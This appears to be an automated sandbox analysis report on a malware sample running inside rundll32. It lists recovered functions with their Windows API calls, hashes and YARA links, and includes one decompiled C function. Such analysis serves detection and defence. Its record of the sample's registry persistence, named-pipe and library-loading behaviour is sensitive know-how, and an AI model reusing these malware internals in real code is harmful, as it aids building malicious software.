                                                          Similarity
                                                          • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                                          • String ID:
                                                          • API String ID: 773763258-0
                                                          • Opcode ID: 655b3a9ff3b21413589408d11f172aa92fbd89e87dc38889e132bffa6727a4dc
                                                          • Instruction ID: a9535587f9753ddc88c85bbaec53060775c2bb0cdebe1c0858c93874690b9ac9
                                                          • Opcode Fuzzy Hash: 655b3a9ff3b21413589408d11f172aa92fbd89e87dc38889e132bffa6727a4dc
                                                          • Instruction Fuzzy Hash: B9712371910119EFCB11DFA5E88ADAEBFB9FB08310F05445AF515A3220DB34AA49EF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557A8A1, Relevance: 18.2, APIs: 12, Instructions: 183synchronizationstringthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0557A8C8
                                                          • memcpy.NTDLL(?,?,00000010), ref: 0557A8EB
                                                          • memset.NTDLL ref: 0557A937
                                                          • lstrcpyn.KERNEL32(?,?,00000034), ref: 0557A94B
                                                          • GetLastError.KERNEL32 ref: 0557A979
                                                          • GetLastError.KERNEL32 ref: 0557A9C0
                                                          • GetLastError.KERNEL32 ref: 0557A9DF
                                                          • WaitForSingleObject.KERNEL32(?,000927C0), ref: 0557AA19
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0557AA27
                                                          • GetLastError.KERNEL32 ref: 0557AAA1
                                                          • ReleaseMutex.KERNEL32(?), ref: 0557AAB3
                                                          • RtlExitUserThread.NTDLL(?), ref: 0557AAC9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                                                          • String ID:
                                                          • API String ID: 4037736292-0
                                                          • Opcode ID: 0f07d69fdc0ef15c088619c72d6f58f8c14e134f8b5905d17ed52ac10d248895
                                                          • Instruction ID: 9ce5970c6ab6d4ae08281b69b899ec90f009e71db880cf2a75c0361b05d57d71
                                                          • Opcode Fuzzy Hash: 0f07d69fdc0ef15c088619c72d6f58f8c14e134f8b5905d17ed52ac10d248895
                                                          • Instruction Fuzzy Hash: D9618971518704AFD720DF21E949A2FBBE9FF84720F018A1EF596D2580EB74E808DB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05572332, Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000), ref: 05572348
                                                          • lstrlen.KERNEL32(?), ref: 05572350
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05572360
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0557237F
                                                          • lstrlen.KERNEL32(?), ref: 05572394
                                                          • lstrlen.KERNEL32(?), ref: 055723A2
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 055723F0
                                                          • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 05572414
                                                          • lstrlen.KERNEL32(?), ref: 05572447
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 05572472
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 05572489
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 05572496
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                                          • String ID:
                                                          • API String ID: 904523553-0
                                                          • Opcode ID: 1dc3a60d57845310e7e587fc767af824103941b035cb902f30d15b63a09a4e5c
                                                          • Instruction ID: 639c275fd5d242073b68a1869064a033871eb7457fc7a99553b25d0963ddb1db
                                                          • Opcode Fuzzy Hash: 1dc3a60d57845310e7e587fc767af824103941b035cb902f30d15b63a09a4e5c
                                                          • Instruction Fuzzy Hash: 5B418A7590024EEFDF129FA5EC84AAE7FB6FB44310F114026F811A7250DB34AA55DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055930B6, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 055930E8
                                                          • WaitForSingleObject.KERNEL32(000002DC,00000000), ref: 0559310A
                                                          • ConnectNamedPipe.KERNEL32(?,?), ref: 0559312A
                                                          • GetLastError.KERNEL32 ref: 05593134
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05593158
                                                          • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,00000010,00000000), ref: 0559319B
                                                          • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 055931A4
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 055931AD
                                                          • CloseHandle.KERNEL32(?), ref: 055931C2
                                                          • GetLastError.KERNEL32 ref: 055931CF
                                                          • CloseHandle.KERNEL32(?), ref: 055931DC
                                                          • RtlExitUserThread.NTDLL(000000FF), ref: 055931F2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                                          • String ID:
                                                          • API String ID: 4053378866-0
                                                          • Opcode ID: 41add28ae978117814c0c84971964bae83b3443af6101c25d65e25a70777f70d
                                                          • Instruction ID: 63fc1454890d1b3c6bea61d589e4ae663462b8292ef91c94b6e698e81f0bb0a9
                                                          • Opcode Fuzzy Hash: 41add28ae978117814c0c84971964bae83b3443af6101c25d65e25a70777f70d
                                                          • Instruction Fuzzy Hash: 21318170518305EFDF119F64CC8986BBBBAFF84354F020E2AF565D20A0DB38990DAB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05571F77, Relevance: 18.1, APIs: 12, Instructions: 94registrymemorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(?), ref: 05571F88
                                                          • GetTempPathA.KERNEL32(00000000,00000000,?,?,05579EC5,00000000,00000094,00000000,?), ref: 05571FA0
                                                          • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 05571FAF
                                                          • GetTempPathA.KERNEL32(00000001,00000000,?,?,05579EC5,00000000,00000094,00000000,?), ref: 05571FC2
                                                          • GetTickCount.KERNEL32 ref: 05571FC6
                                                          • wsprintfA.USER32 ref: 05571FDD
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05572018
                                                          • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 05572035
                                                          • lstrlen.KERNEL32(00000000), ref: 0557203F
                                                          • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 0557204F
                                                          • RegCloseKey.ADVAPI32(?), ref: 0557205B
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000001,00000000,?), ref: 05572069
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 3778301466-0
                                                          • Opcode ID: 4cf4a2318bc0526887b25dc2f6e3193ed97ab1cd36f9d7431dbb6452df18ba87
                                                          • Instruction ID: d49a91b31284547c4fe7ccaafc77726d80e10a719044df022468481e482fc720
                                                          • Opcode Fuzzy Hash: 4cf4a2318bc0526887b25dc2f6e3193ed97ab1cd36f9d7431dbb6452df18ba87
                                                          • Instruction Fuzzy Hash: C9314A75510209EFDB109FA5EC89DAA7FADFB45394B024016F90686100DB399E59EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557D3B4, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 0557D3DE
                                                          • GetCurrentThreadId.KERNEL32 ref: 0557D3F4
                                                          • GetCurrentThread.KERNEL32 ref: 0557D405
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                            • Part of subcall function 0557612D: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,75145520,00000000,?,0557D44F,00000020,00000000,?,00000000), ref: 05576198
                                                            • Part of subcall function 0557612D: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,75145520,00000000,?,0557D44F,00000020,00000000,?,00000000), ref: 055761C0
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0557D47F
                                                          • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0557D48B
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0557D4DA
                                                          • wsprintfA.USER32 ref: 0557D4F2
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 0557D4FD
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0557D514
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                                          • String ID: W
                                                          • API String ID: 630447368-655174618
                                                          • Opcode ID: 5ad6c7efa0e5d4b220c4f1244c9b5dd30fe3884a860c79ad6a9b0ab7dff146b0
                                                          • Instruction ID: f477406fa091bfc1487324b5a0e2ff1c8b5c8b0c9f32dfa9f7a48cf9e202aee8
                                                          • Opcode Fuzzy Hash: 5ad6c7efa0e5d4b220c4f1244c9b5dd30fe3884a860c79ad6a9b0ab7dff146b0
                                                          • Instruction Fuzzy Hash: B841707190121DFFDF119FA1EC49CAE7FBAFF44354B014426F40996210DB78AA54EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05592685, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110librarymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,7519F560,00000000,00000000), ref: 055926A5
                                                          • TlsAlloc.KERNEL32 ref: 055926AF
                                                          • LoadLibraryA.KERNEL32(?), ref: 055926D8
                                                          • LoadLibraryA.KERNEL32(?), ref: 055926E6
                                                          • LoadLibraryA.KERNEL32(?), ref: 055926F4
                                                          • LoadLibraryA.KERNEL32(?), ref: 05592702
                                                          • LoadLibraryA.KERNEL32(?), ref: 05592710
                                                          • LoadLibraryA.KERNEL32(?), ref: 0559271E
                                                          • HeapFree.KERNEL32(00000000,?), ref: 055927C9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$AllocFreeHeap
                                                          • String ID: ~
                                                          • API String ID: 356845663-1707062198
                                                          • Opcode ID: fbcbbd7c95e3dc799804ac2ea0ffaaafa5f56ff79394a0382246942151f9afac
                                                          • Instruction ID: d886f37a8a1d5af9d039d936cd16f02b5f3a37a3cf900727845d5135e741e38f
                                                          • Opcode Fuzzy Hash: fbcbbd7c95e3dc799804ac2ea0ffaaafa5f56ff79394a0382246942151f9afac
                                                          • Instruction Fuzzy Hash: B9416879E10219EFDF04DFA8D886D997BFCFB08204F124567E505EB240DB78AD48AB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05585A0D, Relevance: 16.7, APIs: 11, Instructions: 155registrystringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 05585A38
                                                            • Part of subcall function 05580110: RegCloseKey.ADVAPI32(?,?,?,05579B89,00000000,00000000,00000000), ref: 05580197
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 05585A73
                                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 05585AD4
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 05585AE9
                                                          • lstrcpyW.KERNEL32(?), ref: 05585B03
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 05585B12
                                                            • Part of subcall function 05588C8E: lstrlenW.KERNEL32(?,?,?,05577DC5,?,?,?,?,00001000,?,?,00001000), ref: 05588CA1
                                                            • Part of subcall function 05588C8E: lstrlen.KERNEL32(?,?,05577DC5,?,?,?,?,00001000,?,?,00001000), ref: 05588CAC
                                                            • Part of subcall function 05588C8E: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 05588CC1
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 05585B7C
                                                            • Part of subcall function 0557B585: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,05579C46,?), ref: 0557B591
                                                            • Part of subcall function 0557B585: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,05579C46,?), ref: 0557B5B9
                                                            • Part of subcall function 0557B585: memset.NTDLL ref: 0557B5CB
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 05585BB1
                                                          • GetLastError.KERNEL32 ref: 05585BBC
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05585BD2
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 05585BE4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                                          • String ID:
                                                          • API String ID: 1430934453-0
                                                          • Opcode ID: 9e451b29a06192c444f0b1f450c011e860c0555dc67445e8519b4e0cd476f668
                                                          • Instruction ID: e91d8f1167618b09d94728f743da1dc86bb7f7b1017e9209e6a83e9d6ac324b6
                                                          • Opcode Fuzzy Hash: 9e451b29a06192c444f0b1f450c011e860c0555dc67445e8519b4e0cd476f668
                                                          • Instruction Fuzzy Hash: 9C518B7190020AFFDB11EBA1DC45EBE7BBEFF56311B050456F502A3110EB39DA09ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558A28B, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0558A2C1
                                                          • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0558A2D6
                                                          • RegCreateKeyA.ADVAPI32(80000001,?), ref: 0558A2FE
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,055723D9,00000000,?), ref: 0558A33F
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,055723D9,00000000,?), ref: 0558A34F
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0558A362
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0558A371
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,055723D9,?,?,?,?,?,055723D9,00000000,?), ref: 0558A3BB
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,055723D9,00000000,?,?,?,?), ref: 0558A3DF
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,055723D9,00000000,?,?,?,?), ref: 0558A404
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,055723D9,00000000,?,?,?,?), ref: 0558A419
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$Allocate$CloseCreate
                                                          • String ID:
                                                          • API String ID: 4126010716-0
                                                          • Opcode ID: 47b0e9154d691be1fa90b6008f2e6b582c83f1eec9fefd905e3f57d8d23247f7
                                                          • Instruction ID: db363ff9ebccf3eec9f7d169ccdb67d7113552bf4b9d41368e6aafc728538c6b
                                                          • Opcode Fuzzy Hash: 47b0e9154d691be1fa90b6008f2e6b582c83f1eec9fefd905e3f57d8d23247f7
                                                          • Instruction Fuzzy Hash: 6F51F2B1C10109EFDF01DF95D9858EEBFB9FB08364B11402AF515B2220DB359A99EF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05583D07, Relevance: 16.6, APIs: 11, Instructions: 119memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 05583D21
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 05583D37
                                                          • lstrlenW.KERNEL32(00000000), ref: 05583D7A
                                                          • RtlAllocateHeap.NTDLL(00000000,05594AA4), ref: 05583D90
                                                          • memcpy.NTDLL(00000000,00000000,05594AA2), ref: 05583DA3
                                                          • _wcsupr.NTDLL ref: 05583DAE
                                                          • lstrlenW.KERNEL32(?,05594AA2), ref: 05583DE7
                                                          • RtlAllocateHeap.NTDLL(00000000,?,05594AA2), ref: 05583DFC
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 05583E12
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 05583E37
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05583E46
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                                          • String ID:
                                                          • API String ID: 3868788785-0
                                                          • Opcode ID: 4fe351d11da193e2342093c62447282e36e0785e7033489d095af9ec65bd1b8d
                                                          • Instruction ID: ba83792b654c62057687f1c82de82b15cf8cf60fe166cb3ae4f6eaf249092a86
                                                          • Opcode Fuzzy Hash: 4fe351d11da193e2342093c62447282e36e0785e7033489d095af9ec65bd1b8d
                                                          • Instruction Fuzzy Hash: AF312C32514215EBD7206F64EC8993F7FA9FB49B60F170E1AF512E3141DF78A8489B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E56414, Relevance: 16.6, APIs: 11, Instructions: 112stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 43%
                                                          			E00E56414(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0xe5a38c; // 0x51b9bd8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00E52292(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xe591ac;
				}
				_t46 = E00E516F4(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00E55FBC(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xe5a2d4; // 0x435d5a8
						_t16 = _t75 + 0xe5bab8; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00E52292(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xe591b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00E55FBC(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00E513CC(_v20);
						} else {
							_t66 =  *0xe5a2d4; // 0x435d5a8
							_t31 = _t66 + 0xe5bbd8; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00E513CC(_v12);
				}
				return _v24;
			}




























                                                          0x00e5641c
                                                          0x00e56422
                                                          0x00e56429
                                                          0x00e5642f
                                                          0x00e56433
                                                          0x00e56437
                                                          0x00e5643a
                                                          0x00e56441
                                                          0x00e56444
                                                          0x00e56446
                                                          0x00e56446
                                                          0x00e5644f
                                                          0x00e56456
                                                          0x00e56459
                                                          0x00e5645f
                                                          0x00e56469
                                                          0x00e56472
                                                          0x00e56479
                                                          0x00e56492
                                                          0x00e56499
                                                          0x00e5649c
                                                          0x00e564a5
                                                          0x00e564ae
                                                          0x00e564bf
                                                          0x00e564c8
                                                          0x00e564cc
                                                          0x00e564d0
                                                          0x00e564d7
                                                          0x00e564da
                                                          0x00e564dc
                                                          0x00e564dc
                                                          0x00e564e6
                                                          0x00e564ef
                                                          0x00e564f6
                                                          0x00e5650e
                                                          0x00e56512
                                                          0x00e5654f
                                                          0x00e56514
                                                          0x00e56517
                                                          0x00e5651f
                                                          0x00e56530
                                                          0x00e5653c
                                                          0x00e56544
                                                          0x00e56548
                                                          0x00e56548
                                                          0x00e56512
                                                          0x00e56557
                                                          0x00e5655c
                                                          0x00e56563

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00E56429
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 00E56469
                                                          • lstrlen.KERNEL32(00000000), ref: 00E56472
                                                          • lstrlen.KERNEL32(00000000), ref: 00E56479
                                                          • lstrlenW.KERNEL32(80000002), ref: 00E56486
                                                          • wsprintfW.USER32 ref: 00E564BF
                                                          • lstrlen.KERNEL32(?,00000004), ref: 00E564E6
                                                          • lstrlen.KERNEL32(?), ref: 00E564EF
                                                          • lstrlen.KERNEL32(?), ref: 00E564F6
                                                          • lstrlenW.KERNEL32(?), ref: 00E564FD
                                                          • wsprintfW.USER32 ref: 00E56530
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 822878831-0
                                                          • Opcode ID: 4ce60f77d3ebe87aec0d4c10b8255c009fb12a959c57889c7a4f62a540423d98
                                                          • Instruction ID: 6b65e5ec33bf4bacc18b5897c156645b2e83a0867481705d0b2e4a9db9cf19f4
                                                          • Opcode Fuzzy Hash: 4ce60f77d3ebe87aec0d4c10b8255c009fb12a959c57889c7a4f62a540423d98
                                                          • Instruction Fuzzy Hash: A3416B76900219EFCF11AFA4CD09ADE7BB5EF44319F0508A5EE04B7222D7359A58EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05579B42, Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05579B66
                                                            • Part of subcall function 05580110: RegCloseKey.ADVAPI32(?,?,?,05579B89,00000000,00000000,00000000), ref: 05580197
                                                          • lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 05579B95
                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000), ref: 05579BA6
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05579BE0
                                                          • RegSetValueExA.ADVAPI32(00000004,?,00000000,00000004,?,00000004), ref: 05579C02
                                                          • RegCloseKey.ADVAPI32(?), ref: 05579C0B
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05579C21
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05579C36
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05579C4A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05579C5F
                                                          • RegCloseKey.ADVAPI32(?), ref: 05579C68
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                                          • String ID:
                                                          • API String ID: 534682438-0
                                                          • Opcode ID: 865741385aa5ec566cda867176d63393a037b00543b71e08ad1aa5d9206076c0
                                                          • Instruction ID: 5e9093a46dd40a2c2df83861e319f2fcea3bd02a86d71a0d870ea611076ce451
                                                          • Opcode Fuzzy Hash: 865741385aa5ec566cda867176d63393a037b00543b71e08ad1aa5d9206076c0
                                                          • Instruction Fuzzy Hash: 19313975510108FFDF119FA5EC8ADAE7FBEFB48310B154156F505E2060EB399A48EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05573513, Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0557352A
                                                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,0557A045,00000000,00000094,00000001,00000000,00000094,00000000,?,05571A31,00000000,00000000), ref: 0557353C
                                                          • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,0557A045,00000000,00000094,00000001,00000000,00000094,00000000,?,05571A31,00000000,00000000), ref: 05573549
                                                          • wsprintfA.USER32 ref: 05573564
                                                          • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,05571A31,00000000,00000000,00000094), ref: 0557357A
                                                          • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 05573593
                                                          • WriteFile.KERNEL32(00000000,00000000), ref: 0557359B
                                                          • GetLastError.KERNEL32 ref: 055735A9
                                                          • CloseHandle.KERNEL32(00000000), ref: 055735B2
                                                          • GetLastError.KERNEL32(?,00000000,?,0557A045,00000000,00000094,00000001,00000000,00000094,00000000,?,05571A31,00000000,00000000,00000094), ref: 055735C3
